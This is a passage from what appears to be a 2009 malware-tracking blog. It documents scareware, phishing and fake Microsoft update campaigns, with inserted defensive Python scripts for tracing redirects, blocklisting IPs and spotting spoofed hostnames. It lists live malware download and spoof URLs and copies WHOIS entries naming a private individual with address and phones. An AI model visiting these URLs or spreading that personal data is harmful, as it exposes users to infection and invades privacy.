Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "898b-407-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:18 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=111
ETag: "898b-407-45c848abe2c00"

------------------------------------------------------------------
GET /images/progressbar_green.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "898a-c5-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:19 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=108
ETag: "898a-c5-45c848abe2c00"

------------------------------------------------------------------
GET /images/i2000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8981-431-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:19 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=110
ETag: "8981-431-45c84872aa500"

------------------------------------------------------------------
GET /images/alert.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8978-3e0a-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:23 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=107
ETag: "8978-3e0a-45c84872aa500"

------------------------------------------------------------------


Which, as you've no doubt guessed, leads you to the usual scareware infection. The chain is all there in the trace above: the affiliate feed (triwoperl.com, aff=19362) bounces the visitor off kkk.php on 207.226.184.198 to amgokz.net/in.cgi, which sets its SL_ cookies and runs an antibot check before handing the visitor on to tlupdate.info with the affiliate ID (affid=02909).


The installer itself is downloaded from tlupdate.info (IP: 89.149.210.147, reverse DNS 89.149.210.147.internetserviceteam.com);

tlupdate.info/download.php?affid=02909

Which gives you a file called install.exe (563K, MD5 206ca7574b8cf634f3b4add5e8d96e09)

http://www.virustotal.com/analisis/28204e54cdf4c7e495bf7ec93b261cffab4ac6b0243ead9d341611606b3a2368-1250087886

You'll no doubt have noticed Sunbelt flagging it as Waledac, which means you're getting a whole lot more than just scareware.

One of these days, NetDirekt will learn that the longer they allow this on their IP ranges, the longer it's going to take for those such as myself to stop blackholing every NetDirekt range I come across (including several I'm processing for addition as I write this, e.g. 95.168.185.0-95.168.191.255).
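As an added example (not code from the original post, nor anything hpHosts ships), here is a small Python script that reads a capture laid out like the one above, follows each response's Location to rebuild the redirect chain, flags the hops the browser started on its own rather than by following a 3xx (the in.cgi?20 request that the in.cgi?16 page triggers, for instance), and emits the hostnames in hosts-file form, with bare IPs such as 207.226.184.198 listed separately since a hosts file cannot block those. It assumes the capture's layout (request, blank line, response, a dashed line between blocks) and LF line endings; the embedded sample is a trimmed excerpt of the capture above with the base64 data= blob shortened.

```python
# Added example (not the post's or hpHosts' code). Assumes the capture layout
# above: request, blank line, response, dashed line between blocks, LF endings.
# SAMPLE_TRACE is a trimmed excerpt of that capture (base64 blob shortened).
import ipaddress
import re
from urllib.parse import urljoin, urlsplit

SEPARATOR = re.compile(r"^-{10,}[ \t]*$", re.MULTILINE)

SAMPLE_TRACE = """\
GET /kkk.php?data=YlZ6kCc8 HTTP/1.1
Host: 207.226.184.198

HTTP/1.1 302 Found
Location: http://amgokz.net/in.cgi?16&parameter=hphosts&ur=1&HTTP_REFERER=19362
------------------------------------------------------------------
GET /in.cgi?16&parameter=hphosts&ur=1&HTTP_REFERER=19362 HTTP/1.1
Host: amgokz.net

HTTP/1.1 200 OK
------------------------------------------------------------------
GET /in.cgi?20&parameter=bank+online4&ur=1&HTTP_REFERER= HTTP/1.1
Host: amgokz.net

HTTP/1.1 302 Found
Location: http://tlupdate.info/hitin.php?land=20&affid=02909
------------------------------------------------------------------
GET /hitin.php?land=20&affid=02909 HTTP/1.1
Host: tlupdate.info

HTTP/1.1 302 Found
Server: Apache/2.2.11 (Unix) PHP/5.2.10
location: index.php?affid=02909
------------------------------------------------------------------
GET /index.php?affid=02909 HTTP/1.1
Host: tlupdate.info

HTTP/1.1 200 OK
"""


def _parse_message(chunk):
    """(first line, headers) for one request or response; header names are
    lower-cased because the capture mixes 'Location:' and 'location:'."""
    lines = [ln for ln in chunk.strip().splitlines() if ln.strip()]
    headers = {}
    for ln in lines[1:]:
        name, sep, value = ln.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_trace(text):
    """One dict per block: request URL, response status, resolved Location."""
    hops = []
    for block in SEPARATOR.split(text):
        if not block.strip():
            continue
        parts = re.split(r"\n[ \t]*\n", block.strip(), maxsplit=1)
        req_line, req_hdrs = _parse_message(parts[0])
        target = req_line.split(" ", 2)[1]
        url = f"http://{req_hdrs.get('host', '')}{target}"
        hop = {"url": url, "status": None, "location": None}
        if len(parts) == 2:
            status_line, resp_hdrs = _parse_message(parts[1])
            hop["status"] = int(status_line.split(" ", 2)[1])
            if "location" in resp_hdrs:
                # urljoin resolves the relative 'index.php?affid=...' hop.
                hop["location"] = urljoin(url, resp_hdrs["location"])
        hops.append(hop)
    return hops


def redirect_chain(hops):
    """(url, status, followed) per hop. 'followed' is True when the request is
    the target of the previous hop's Location; False means the browser started
    a fresh request (page content, iframe or script) rather than a 3xx hop."""
    chain, expected = [], None
    for hop in hops:
        chain.append((hop["url"], hop["status"], hop["url"] == expected))
        expected = hop["location"]
    return chain


def blackhole_hosts(hops):
    """Hostnames in hosts-file form, plus bare IPs that a hosts file cannot
    cover and have to be dropped at the firewall instead."""
    names, ips = set(), set()
    for hop in hops:
        for url in (hop["url"], hop["location"]):
            host = urlsplit(url).hostname if url else None
            if not host:
                continue
            try:
                ipaddress.ip_address(host)
                ips.add(host)
            except ValueError:
                names.add(host)
    return {"hosts": [f"127.0.0.1\t{h}" for h in sorted(names)],
            "ips": sorted(ips)}


if __name__ == "__main__":
    parsed = parse_trace(SAMPLE_TRACE)
    for url, status, followed in redirect_chain(parsed):
        print(f"{'->' if followed else '**'} {status} {url}")
    print(*blackhole_hosts(parsed)["hosts"], sep="\n")
```

Run as a script it prints the chain; hops marked ** are fresh requests rather than 3xx follow-ons, which is exactly where the in.cgi page content (cookie set, antibot check) does its work before the next 302.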

/edit 13-08-2009 16:15

As of August 13th, the stromiko.com domain appears to have been deleted as it's no longer registered and thus, no longer active.

References:

hpHosts - Stromiko
http://hosts-file.net/?s=stromiko

hpHosts - Internet Service Team
http://hosts-file.net/pest.asp?show=internetserviceteam

hpHosts - 95.168.*
http://hosts-file.net/?s=95.168.&view=matches

Tuesday, 11 August 2009

Spam: Top two offenders

I thought I'd note the current top two offenders for spam and such that have been attempting to abuse one of the sites I look after.

Neither will come as much of a surprise, given their location, but I recommend blackholing their entire ranges.

114.240.0.0 - 114.255.255.255 - belongs to UNICOM-BJ (China, AS4808)
82.144.196.0 - 82.144.219.255 - belongs to VOILA (Ukraine, AS25229)
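The ranges above are given as first-last pairs, which is not the form a firewall wants. As an added example (not from the original post), the snippet below turns them into the minimal set of CIDR blocks, checks an address against them, and emits iptables rules; the labels and the iptables format are my assumptions, the ranges are the two quoted above.

```python
# Added example, not part of the original post. The two ranges are the ones
# quoted above; the iptables rule format is an assumption about where the
# blackholing is done.
import ipaddress

# Ranges as quoted in the post: label -> (first address, last address).
RANGES = {
    "UNICOM-BJ (China, AS4808)": ("114.240.0.0", "114.255.255.255"),
    "VOILA (Ukraine, AS25229)": ("82.144.196.0", "82.144.219.255"),
}


def range_to_cidrs(first, last):
    """Smallest list of CIDR blocks that exactly covers first..last."""
    nets = ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last))
    return [str(n) for n in nets]


def build_blocklist(ranges):
    """label -> list of ip_network objects, ready for membership tests."""
    return {label: [ipaddress.ip_network(c) for c in range_to_cidrs(a, b)]
            for label, (a, b) in ranges.items()}


def blackholed_by(ip, blocklist):
    """Label of the range covering ip, or None if it is not blackholed."""
    addr = ipaddress.ip_address(ip)
    for label, nets in blocklist.items():
        if any(addr in net for net in nets):
            return label
    return None


def iptables_rules(blocklist, chain="INPUT"):
    """One DROP rule per CIDR block, with the range label as a comment."""
    return [f"iptables -A {chain} -s {net} -j DROP  # {label}"
            for label, nets in blocklist.items() for net in nets]


if __name__ == "__main__":
    bl = build_blocklist(RANGES)
    print("\n".join(iptables_rules(bl)))
    print(blackholed_by("82.144.210.7", bl))
```

Note that the Ukrainian range is not a single block: 82.144.196.0-82.144.219.255 needs four CIDRs (/22, /21, /21, /22), so a hand-written single rule would either leak or over-block.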

Free domain with Office Live Small Business? Not anymore!

Microsoft used to offer a free domain name to those registering for its Office Live Small Business service, but come October this changes, with EVERYONE being charged around $15 (approx. £7-8) for the domain name.

El Reg has more on this at;

http://www.theregister.co.uk/2009/08/10/office_live_domains_small_biz_charge/

Little tip folks: if you need a domain, don't get it as part of the hosting, get it separately. Yep, it will cost, but it'll be cheaper in the long run and better for you, especially if you go with Domain Monster (just my opinion, YMMV; just don't get e-mail with DM, as they annoyingly charge £7 p/y for each e-mail account).

Sunday, 9 August 2009

Fake Microsoft e-mails: From RapidShare to orlandoula

It would seem that after rapidshare.com took down the malware that the king.cd links in those lovely fake e-mails pointed to, the bad guys decided enough was enough and have reverted to using non-file-hosting sites to distribute the malware.

Don't fret though, they're still using king.cd, so feel free to blackhole it.

The latest one I've received, which arrived a couple of minutes ago, has the obligatory king.cd URL (king.cd/KuLk), which then leads you to;

hxxp://www.orlandoula.com/MicrosoftFramework.exe

VirusTotal results: http://www.virustotal.com/analisis/4d9412e7ab486f6fa3e64164e65dfa51ebeac1eb083d67c1587db2528befcb3e-1249879734

orlandoula.com currently lives at 67.219.36.164 (AS14242, LogicalSolutions.net). The domain was registered in 2007, so it's likely the site was hacked (though it does beg the question of why it's still got a "website coming shortly" message on its homepage).

References:

Alert: Malicious Microsoft e-mail using king.cd and RapidShare
http://hphosts.blogspot.com/2009/08/alert-malicious-microsoft-e-mail-using.html

Friday, 7 August 2009

idealenterprises.net and SoftLayer in multiple bank phishing scams

Customers of multiple banks are being targeted by a phishing scam hosted on SoftLayer's IP space (see left), with the domains themselves registered to a chap in Pakistan (at least it's not China this time, I suppose).

The server itself is located at 174.37.54.20 (174.37.54.20-static.reverse.softlayer.com), which is the same IP that earlier this year, was found to be the host of malware.

The domains are both owned by the same chap, Hunain Ahmed, who is apparently the owner of Ideal Enterprises. Research shows the domain was previously used for the company, so it's likely the domains have simply been hacked and their being owned by the same company is a coincidence, but I'm a skeptical bugger, so I'm not convinced.

manwarbros.com itself was, earlier today, found to be hosting a PayPal phishing scam, according to PhishTank. The PayPal scam, however, is now returning a 404.

You can see in the following screenshot (thanks to their leaving the directory open for browsing - whoops) the banks being targeted.


As you can see from the screenshot, the banks targeted are;

1. Abbey National
2. Barclays
3. Cahoot
4. Halifax
5. HSBC
6. Lloyds TSB
7. Natwest
8. Royal Bank of Scotland
9. Smile
10. Yorkshire Bank

A check as of two seconds ago (I was going to take some lovely screenshots for you) shows they're all now offline (including the above directory listing), with idealenterprise.net's homepage restored, but I did get a screenshot of one of them for you;



The page in the screenshot top right is still there, showing that whilst they've cleaned up one of them, they've evidently missed the other.

Kudos to Shazza at the MyWOT forums for the heads-up.

Thursday, 6 August 2009

Freeze.com/screensaver.com/shameful-pictures.com in MSN Phishing scam, with bonus malware!

My friend Tom sent me a couple of links earlier, to URLs that were reported to contain worms.

girls.without.clothes.are.on.these.shameful-pictures.com (69.90.81.141 - my.stupid.isp.did.not.update.my.dns - QITX Inc. PEER1-QITX-51)

Not seeing anything other than references to Freeze and login requests in the source code, I created a new MSN account and duly loaded the page in the browser to see if there was indeed a worm. Alas, nope, not thus far.

This one, courtesy of shameful-pictures.com, presents you with a lovely little login form asking for your MSN login details, and yep, it obviously checks whether they're valid, as it kept rejecting the random and bogus data I tried several times, before I gave up and created a dedicated MSN test account for it.

Needless to say, you aren't given any nude pictures, contrary to its claim, nor, however, was I able to find a worm. I did, however, find malware from Freeze.com, which is the only other thing (aside from stealing MSN credentials) this thing seems to give you. Once "logged in" (and I use that term very loosely here), you're presented with;

girls.without.clothes.are.on.these.shameful-pictures.com/pics.php


You've no doubt guessed, but I'm going to tell you anyway: that big "Click here to continue" button leads you to off.freeze.com, but not before it's taken you on a little run-around;

START: 59.152.207.213/redir/?id=1c (IPC-NEWT - Hong Kong)

2. www.cpaclicks.com/secure.asp?e=cinksipisena&d=0&l=0&o=&p=0&subID1=&subID2=&subID3=&subID4=&subID5= (69.18.218.156 - Invision.com, Inc)

3. affiliates.copeac.com/ez/cinksipisena/&dp=0&l=0&p=0 (207.67.0.35 - intermarkmedia.wip.directresponsetech.com - Digital River, Inc. TWTC-DIGITALRIVER)

4. rdt.screensaver.com/?lgid=362&a=8305&f=2338|34103 (207.250.236.170 - ip170.freeze.com - GamePoint Inc. TWTC-GAMEP3)

END: lan.screensaver.com/LPQueue/885/index.asp?SessionId=444a7770-6aea-4935-a4c8-8086c356a5de&nat=0&cc=gb&cid=863170&lgid=362&a=8305&f=2338%7c34103 (87.248.211.177 - cds247.lon.llnw.net - Limelight Networks, LLNW-EU-2)

Or, if you're using Opera, the URL it links you to redirects you to;

register.freeze.com/Download/index.aspx?s=games&c=863168&SessionId=1679581c-2788-4b52-bc03-c2064fee86b0&fn=2334|34103 (207.250.236.107 - ip170.freeze.com - GamePoint Inc. TWTC-GAMEP3)
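The run-around above is easy to miss if you let the browser follow it silently, and the Opera branch shows the final landing page can depend on the User-Agent. Here is an added example (my code, not anything from the post or from the sites involved) that records every hop of a redirect chain and the hostnames it passes through. The fetcher is injected so the chain can be replayed offline from a constructed hop table modelled on the chain above (query strings trimmed, the responses are stand-ins, not captures); for a live trace, drop in an HTTP client with automatic redirects disabled and return its status and Location header.

```python
"""Trace an HTTP redirect chain hop by hop instead of letting the client
follow it silently.  Added example, not code from the original post.  The
fetcher is injected so the chain can be replayed offline from a constructed
table of Location headers; for a live trace, swap in an HTTP client with
automatic redirects disabled and return (status, Location) from it."""
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import urljoin, urlparse

Response = Tuple[int, Optional[str]]        # (status code, Location header)
Fetcher = Callable[[str, str], Response]    # (url, user_agent) -> Response

# Constructed hop table modelled on the chain in the post.  Query strings are
# shortened; these are stand-ins, not captured responses.  The final hop
# branches on User-Agent, as the post observed for Opera.
_CHAIN: Dict[str, Dict[str, Response]] = {
    "http://59.152.207.213/redir/?id=1c":
        {"*": (302, "http://www.cpaclicks.com/secure.asp?e=cinksipisena")},
    "http://www.cpaclicks.com/secure.asp?e=cinksipisena":
        {"*": (302, "http://affiliates.copeac.com/ez/cinksipisena/")},
    "http://affiliates.copeac.com/ez/cinksipisena/":
        {"*": (302, "http://rdt.screensaver.com/?lgid=362&a=8305")},
    "http://rdt.screensaver.com/?lgid=362&a=8305": {
        "*":     (302, "http://lan.screensaver.com/LPQueue/885/index.asp?cc=gb"),
        "Opera": (302, "http://register.freeze.com/Download/index.aspx?s=games"),
    },
    "http://lan.screensaver.com/LPQueue/885/index.asp?cc=gb": {"*": (200, None)},
    "http://register.freeze.com/Download/index.aspx?s=games": {"*": (200, None)},
}

def table_fetcher(url: str, user_agent: str) -> Response:
    """Offline stand-in for one HTTP request with redirects disabled."""
    rules = _CHAIN.get(url)
    if rules is None:
        return (404, None)
    for ua_prefix, resp in rules.items():
        if ua_prefix != "*" and user_agent.startswith(ua_prefix):
            return resp
    return rules["*"]

def trace_redirects(start: str, fetch: Fetcher, user_agent: str = "Mozilla/5.0",
                    max_hops: int = 20) -> List[str]:
    """Ordered list of URLs visited, beginning with `start`.

    Stops at the first non-3xx response, a 3xx without Location, a loop
    (the repeated URL is kept so the loop is visible), or `max_hops`."""
    visited = [start]
    current = start
    for _ in range(max_hops):
        status, location = fetch(current, user_agent)
        if not 300 <= status < 400 or not location:
            break
        nxt = urljoin(current, location)   # Location may be relative
        visited.append(nxt)
        if nxt in visited[:-1]:
            break
        current = nxt
    return visited

def hosts_in_chain(chain: List[str]) -> List[str]:
    """Distinct hostnames in hop order, for blocklisting every party involved."""
    seen: List[str] = []
    for u in chain:
        h = urlparse(u).hostname or ""
        if h and h not in seen:
            seen.append(h)
    return seen

if __name__ == "__main__":
    for ua in ("Mozilla/5.0", "Opera/9.64"):
        print(f"User-Agent: {ua}")
        chain = trace_redirects("http://59.152.207.213/redir/?id=1c", table_fetcher, ua)
        for i, u in enumerate(chain):
            print(f"  {i}: {u}")
        print("  hosts:", ", ".join(hosts_in_chain(chain)))
```

Run it with a couple of different User-Agent strings when you suspect cloaking; every hostname in the resulting list is a candidate for the blocklist, not just the final landing page.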

The other images, to the left and right of the "Click here to continue" button, are all located on MSN search results, so it's possible, if there was a worm, it came from one of those, but I couldn't find it.

Use a USB Key to Install Windows 7—Even on a Netbook

Putting the Windows 7 installation on a USB thumb drive has a few advantages—a small USB key is much more convenient for carrying around than a DVD, the OS will actually install much faster, and you can use a USB key to install Windows 7 on systems that do not have a DVD drive, such as a netbook. In fact, you can even install Windows 7 on netbooks that have fairly modest hardware. Dennis Chung, an IT Pro Evangelist at Microsoft recently posted a video demonstrating how easy it is to prepare your thumb drive and use it to install Windows 7. Here’s a quick look at the process:


Read more
http://technet.microsoft.com/en-gb/magazine/dd535816.aspx

Lies, Damned Lies, and SPYzooka

A friend of mine from the respected Indian antivirus company Quick Heal Technologies recently brought two posts on the web to my attention.

http://www.articlesbase.com/security-articles/do-not-trust-quick-heal-antivirus-plus-2009-987981.html is an article written by someone who does not wish to disclose who they are. The article is pure fiction. Remember, articlesbase.com does not validate content so I would assume everything there is wrong unless I independently verified the facts elsewhere.

The second link, and in my opinion the likely source of the fictitious article is http://bluepenguinsoftware.com/spyzooka/blog/removal-instructions-for-quickhealantivirusplus2009/

The author of the “blog”, Carl Haugen, claims:

“Like other rogues, it claims to be beneficial but in actuality it is malevolent. Instead of helping remove threats, it will download spyware, Trojan horse apps, adware, and other malware.”

I’m not a lawyer, but I have advised my friend that if Quick Heal chooses to sue BluePenguin Software for libel, I would be happy to testify on behalf of Quick Heal. It sure looks like a slam-dunk libel case to me.

It is possible that the folks at BluePenguin downloaded a pirated, cracked version of the program, but if they had downloaded the program from the developer’s web site they would have a legitimate antivirus product.

If you do your research on Quick Heal, you will find that they are tested by Virus Bulletin, have 27 VB 100 awards, 10 failures, and 28 no entries. Spyzooka does not participate in VB testing.

Quick Heal is certified by Westcoast labs Checkmark certification for both antivirus and spyware. Spyzooka is not certified.

Quick Heal is a corporate member of AVAR, the Association of Asia Antivirus Researchers, where I sit on the board of directors with my friend Sanjay Katkar of Quick Heal.


Read more
http://www.eset.com/threat-center/blog/2009/08/05/lies-damned-lies-and-spyzooka/

Note: Both BluePenguin and ArticlesBase have removed the articles, but they can still be found in the Google cache at;

bluepenguinsoftware.com/spyzooka/blog/removal-instructions-for-quickhealantivirusplus2009/
www.articlesbase.com/security-articles/do-not-trust-quick-heal-antivirus-plus-2009-987981.html
www.articlesbase.com/security-articles/quickhealantivirusplus2009-is-nothing-short-of-a-scam-987985.html

Alert: Malicious Microsoft e-mail using king.cd and RapidShare

I've just had the following drop in my inbox, and this is the first time I've seen a RapidShare URL NOT require you to wait or enter a CAPTCHA to download the file - it just downloaded straight off the bat (saves me time analyzing it though ;o)).

hxxp://king.cd/OF4JTo7
>> hxxp://rs668tl.rapidshare.com/files/263883656/Microsoft_FrameworkUpgrade.exe

The headers show the e-mail was sent from 121.96.18.2 (121.96.18.2.bti.net.ph) which is on the BAYAN_ZION-AP (BayanTel Broadband) range, which you'll not be surprised to hear, is a residential broadband company.

The file you're given is a worm;

VirusTotal - Microsoft_FrameworkUpgrade.exe
http://www.virustotal.com/analisis/f26de7d6d5cd04927fd4b2f74019e9e68c0aa29df0b72e69ba304ca84f0883fe-1249507230
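The sending IP above comes from the message headers, and it's worth being careful about which Received: line you read it from. Each MTA prepends its own Received: line, so the newest is at the top, and everything below the first line written by your own mail server arrived inside the message and can be forged by the bot. Here is an added example (my code, not from the post) that walks the headers from the top, through the hops your own servers wrote, and returns the first outside address that handed the mail over. The message is constructed for illustration: the source IP matches the post, the receiving hostnames and the 192.0.2.0/24 address space are made up, and the bottom Received: line is the sort of fake hop a bot adds to look like it came from Microsoft.

```python
"""Find the true origin of an e-mail from its Received: headers.  Added
example, not code from the original post.  Each MTA prepends a Received:
line, so the topmost is the newest hop; every line below the first one
written by *your own* servers arrived inside the message and can be forged.
The message below is constructed for illustration: the source IP matches the
post, the receiving hostnames are made up, and the bottom header is the kind
of fake line a bot adds to make the mail look as if it came from Microsoft."""
import email
import ipaddress
import re
from typing import Iterable, List, Optional

SAMPLE_EMAIL = """\
Received: from mx1.example.invalid (mx1.example.invalid [192.0.2.10])
\tby mailbox.example.invalid with ESMTP id 4XyZ; Tue, 4 Aug 2009 10:02:11 +0100
Received: from 121.96.18.2.bti.net.ph (121.96.18.2.bti.net.ph [121.96.18.2])
\tby mx1.example.invalid with SMTP id 9aB; Tue, 4 Aug 2009 10:02:10 +0100
Received: from update.microsoft.com (localhost [127.0.0.1])
\tby 121.96.18.2.bti.net.ph with SMTP; Tue, 4 Aug 2009 10:02:09 +0100
From: Microsoft <update@microsoft.com>
To: victim@example.invalid
Subject: Microsoft Outlook/Office Update

Please download the attached update.
"""

# Constructed trust boundary: hosts and address space we operate.
OUR_MTAS = {"mailbox.example.invalid", "mx1.example.invalid"}
OUR_NETS = [ipaddress.ip_network("192.0.2.0/24")]

# "from <peer> by <us>"; the peer part normally carries the IP in [brackets].
_HOP = re.compile(r"\bfrom\s+(?P<peer>.*?)\s+by\s+(?P<by>[A-Za-z0-9.-]+)", re.I)
_IP = re.compile(r"\[(?:IPv6:)?([0-9A-Fa-f.:]+)\]")

def received_headers(raw: str) -> List[str]:
    """All Received: headers, newest first, with folding whitespace collapsed."""
    msg = email.message_from_string(raw)
    return [" ".join(str(v).split()) for v in msg.get_all("Received", [])]

def _ip_in(text: str):
    """First bracketed IP in `text` as an ipaddress object, or None."""
    m = _IP.search(text)
    if not m:
        return None
    try:
        return ipaddress.ip_address(m.group(1))
    except ValueError:
        return None

def origin_ip(raw: str, our_mtas: Iterable[str] = OUR_MTAS,
              our_nets=OUR_NETS) -> Optional[str]:
    """Walk the hops our own servers wrote, newest first, and return the first
    public IP outside our infrastructure that handed the mail to us.  None if
    the chain never leaves our servers or a hop cannot be parsed."""
    ours = {h.lower() for h in our_mtas}
    for hdr in received_headers(raw):
        hop = _HOP.search(hdr)
        if not hop or hop.group("by").lower().rstrip(".") not in ours:
            break                       # everything below is sender-controlled
        ip = _ip_in(hop.group("peer"))
        if ip is None or not ip.is_global or any(ip in n for n in our_nets):
            continue                    # internal relay; keep walking down
        return str(ip)
    return None

def bottom_hop_ip(raw: str) -> Optional[str]:
    """The naive answer: the IP in the *oldest* Received: line.  On this
    message it returns the forged 127.0.0.1, which is why origin_ip() stops
    at the trust boundary instead of trusting the bottom of the stack."""
    hdrs = received_headers(raw)
    if not hdrs:
        return None
    ip = _ip_in(hdrs[-1])
    return str(ip) if ip is not None else None

if __name__ == "__main__":
    print("origin via trust boundary:", origin_ip(SAMPLE_EMAIL))
    print("oldest Received: line    :", bottom_hop_ip(SAMPLE_EMAIL))
```

Feed OUR_MTAS and OUR_NETS with your real inbound relays; the point is that the answer only counts when the "by" side of the hop is a server you control.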

Tuesday, 4 August 2009

YAB (Yet Another Botnet) Microsoft exploit e-mails

We've got more of these fake Microsoft e-mails doing the rounds folks, and as with the Alliance and Leicester scams, these are all hosted on residential machines by the looks of it.

Unlike the Alliance and Leicester ones however, these have a nasty surprise waiting for you.

Should you realize your mistake before infecting yourself with the download they're offering, they've been kind enough to try and ensure you get *something*, which in this case comes from fx-news.ru, and thankfully, at the time of writing, the exploit part of this isn't working.


The URL that should be giving you the exploit, is currently serving a MySQL error message;

Can't connect to MySQL server on '91.207.116.22' (4)


91.207.116.22 is located on a Rushkranian block, apparently owned by Rise-v Ltd, which was also the source of the exploit at kervinly.com.

inetnum: 91.207.116.0 - 91.207.117.255
netname: EASTNET-UA-NET-2
descr: Rise-v Ltd
country: UA
org: ORG-RL28-RIPE
admin-c: LV1630-RIPE
tech-c: LV1630-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: MNT-NETART
mnt-routes: MNT-NETART
mnt-domains: MNT-NETART
source: RIPE # Filtered

organisation: ORG-RL28-RIPE
org-name: Rise-v, Ltd.
org-type: OTHER
descr: Rise-v, Ltd.
address: Traktorostroiteley str. 158, apt. 43
address: 61129, Kharkov, Ukraine
phone: +38 057 7616277
phone: +38 067 5791028
admin-c: LV1630-RIPE
tech-c: LV1630-RIPE
mnt-ref: EASTNET-MNT
mnt-by: EASTNET-MNT
source: RIPE # Filtered

person: Valera Lelin
address: 61129, Ukraine, Kharkov, Traktorostroiteley 158 str, apt. 43
phone: +380577507505
phone: +380639797654
remarks: ICQ: 4333444
remarks: agaaga
abuse-mailbox: abuse@rise.com.ua
nic-hdl: LV1630-RIPE
mnt-by: EASTNET-MNT
source: RIPE # Filtered

:: Information related to '91.207.116.0/23AS49536'

route: 91.207.116.0/23
descr: DENTAGLOBAL route
origin: AS49536
mnt-by: DENTA-MNT
source: RIPE # Filtered


URLs I've seen thus far;

http://update.microsoft.com.jiklaut.net/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=463335680057515548370716321207756784829866348428006905629
http://update.microsoft.com.ferrateu.net/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=10523941098791395374955537386571
http://update.microsoft.com.ferratet.net/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=10523941098791395374955537386571
update.microsoft.com.nsatc.net/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=10523941098791395374955537386571
update.microsoft.com.il1if1.com.mx/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=10523941098791395374955537386571
update.microsoft.com.herrjuy.vu/microsoftofficeupdate/isapdl/default.aspx/?ln=en-us&id=286426523836840882450605409068671
update.microsoft.com.ferratep.net/microsoftofficeupdate/isapdl/default.aspx/?ln=en-us&id=286426523836840882450605409068671


Not all of these are still resolving.
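All of these hostnames start with "update.microsoft.com", but the domain they actually register under is jiklaut.net, ferrateu.net, il1if1.com.mx and so on; the familiar name is just the leading labels. That is something a filter can check mechanically. Below is an added example (my code, not from the post) that splits a hostname into its registrable domain (eTLD+1) and flags any URL where a trusted hostname appears as a prefix of a host registered elsewhere. The public-suffix table is a small constructed subset that covers the URLs above; for real use load the full Public Suffix List. The sample list is the post's URLs with the query strings trimmed, plus a bare http://update.microsoft.com/ for contrast.

```python
"""Spot look-alike hostnames that start with a trusted name but register
under a different domain, as in update.microsoft.com.ferrateu.net.  Added
example, not code from the original post.  The public-suffix table is a
small constructed subset that covers the sample URLs; load the full Public
Suffix List (publicsuffix.org) for real use."""
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Constructed subset of public suffixes; longest match wins ("com.mx" over "mx").
PUBLIC_SUFFIXES = {"com", "net", "org", "ru", "vu", "mx", "com.mx"}

# Hostnames we trust, mapped to the registrable domain they must live under.
TRUSTED: Dict[str, str] = {"update.microsoft.com": "microsoft.com"}

def registrable_domain(host: str) -> Optional[str]:
    """eTLD+1 of `host`: 'ferrateu.net' for 'update.microsoft.com.ferrateu.net'.

    Returns None when the host is itself a public suffix or matches none."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):          # longest candidate suffix first
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return None if i == 0 else ".".join(labels[i - 1:])
    return None

def classify(url: str, trusted: Dict[str, str] = TRUSTED) -> Dict[str, Optional[str]]:
    """Return host, registrable domain and a verdict: trusted / spoof / unknown.

    'spoof' means a trusted hostname forms the leading labels of a host whose
    registrable domain is not the trusted one."""
    if "://" not in url:
        url = "http://" + url             # the post lists some URLs bare
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    reg = registrable_domain(host)
    verdict = "unknown"
    for trusted_host, trusted_reg in trusted.items():
        if reg == trusted_reg:
            verdict = "trusted"
            break
        if host == trusted_host or host.startswith(trusted_host + "."):
            verdict = "spoof"
            break
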